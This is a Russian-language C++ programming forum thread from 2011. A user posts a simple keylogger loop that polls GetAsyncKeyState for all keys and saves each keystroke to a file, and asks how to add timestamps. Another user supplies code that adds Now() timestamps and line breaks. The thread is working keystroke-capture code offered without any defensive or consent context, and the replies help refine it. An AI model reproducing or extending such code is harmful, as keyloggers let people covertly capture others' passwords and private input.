Форум программистов, компьютерный форум CyberForum.ru

Запись системного времени в файл. - C++

Восстановить пароль Регистрация
 
Рейтинг: Рейтинг темы: голосов - 11, средняя оценка - 5.00
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 15:40     Запись системного времени в файл. #1
Добрый день гуру!
Есть программка недоработанная.
Перехватывает все нажатые клавиши и пишет их в файл.
Но все символы идут сплошным текстом.
Хочу вставить системное время, потом перехваченные клавиши и сброс на новую строку.
Пример:
"дата, время" - "перехваченные клавиши"
......
2.12.2011, 01:57 - "перехваченные клавиши"
2.12.2011, 01:58 - "перехваченные клавиши"
2.12.2011, 01:59 - "перехваченные клавиши"
2.12.2011, 02:00 - "перехваченные клавиши"
2.12.2011, 02:01 - "перехваченные клавиши"
......
Вот код записи в файл, перехваченных клавиш.
Как сюда можно вставить системное время и дату, подскажите пожалуйста.
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{
index=1;
while (index<256)
{
result=GetAsyncKeyState(index);
Application->ProcessMessages();
if (result!=0) {
             IsSystemKey(index);
             if (KEY!="") Memo1->Lines->Add(KEY);
             else Memo1->Lines->Add((char)index);
             Memo1->Lines->SaveToFile("keys.html");
             while (result!=0)
             {
             result=GetAsyncKeyState(index);
             }
             index=1;
}
index++;
}
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.06.2011, 15:40     Запись системного времени в файл.
Посмотрите здесь:

Вывод системного времени на экран C++
C++ Запись времени в массив
C++ Запись и извлечение даты и времени из БД
C++ функция вывода системного времени
Перевод системного времени C++
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
xAtom
 Аватар для xAtom
910 / 735 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 15:58     Запись системного времени в файл. #2
Now(); - возвращает дату и время в строке ты ведь в Borland-e
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 16:15  [ТС]     Запись системного времени в файл. #3
Цитата Сообщение от xAtom Посмотреть сообщение
Now(); - возвращает дату и время в строке ты ведь в Borland-e
Да делаю в c++ builder (RAD), через форму.
Но проблема не в самой функции..., а в том, как вставить её в код, чтобы время и дата записывались с новой строки, а после них перехваченные клавиши.
xAtom
 Аватар для xAtom
910 / 735 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 16:24     Запись системного времени в файл. #4
Вот держи.
C++
1
Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A'));
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 22:53  [ТС]     Запись системного времени в файл. #5
Тобишь это получается так?
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
index=1;
while (index<256)
{
result=GetAsyncKeyState(index);
Application->ProcessMessages();
if (result!=0) {
             IsSystemKey(index);
             if (KEY!="") Memo1->Lines->Add(KEY);
             else Memo1->Lines->Add((char)index);
                         Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A'));
             Memo1->Lines->SaveToFile("keys.html");
             while (result!=0)
             {
             result=GetAsyncKeyState(index);
             }
             index=1;
}
index++;
}
Добавлено через 4 часа 33 минуты
Атом, большое тебе спасибо, все отлично работает, только пишет все в кучу - сплошным текстом.
Может ты знаешь как сделать перенос на новую строку каждую секунду?
Буду тебе очень благодарен!

Добавлено через 1 час 29 минут
в TXT файле он и так пишет все с новой строки, а вот в HTML все сплошным текстом
xAtom
 Аватар для xAtom
910 / 735 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 22:56     Запись системного времени в файл. #6
C++
1
2
Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A') + '\r');  
// если не поможет то '\n',  если ещё не поможет "\r\n"
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
28.06.2011, 23:03     Запись системного времени в файл.
Еще ссылки по теме:

Запись системного времени в файл C++
Вывод системного времени C++
C++ От системного времени отнять введённое

Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 23:03  [ТС]     Запись системного времени в файл. #7
нее, ни один из 3 вариантов не подошел )).
Больше ничего из системных функций нету?
Yandex
Объявления
28.06.2011, 23:03     Запись системного времени в файл.
Ответ Создать тему
Опции темы

Текущее время: 17:33. Часовой пояс GMT +3.
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2016, vBulletin Solutions, Inc.
Рейтинг@Mail.ru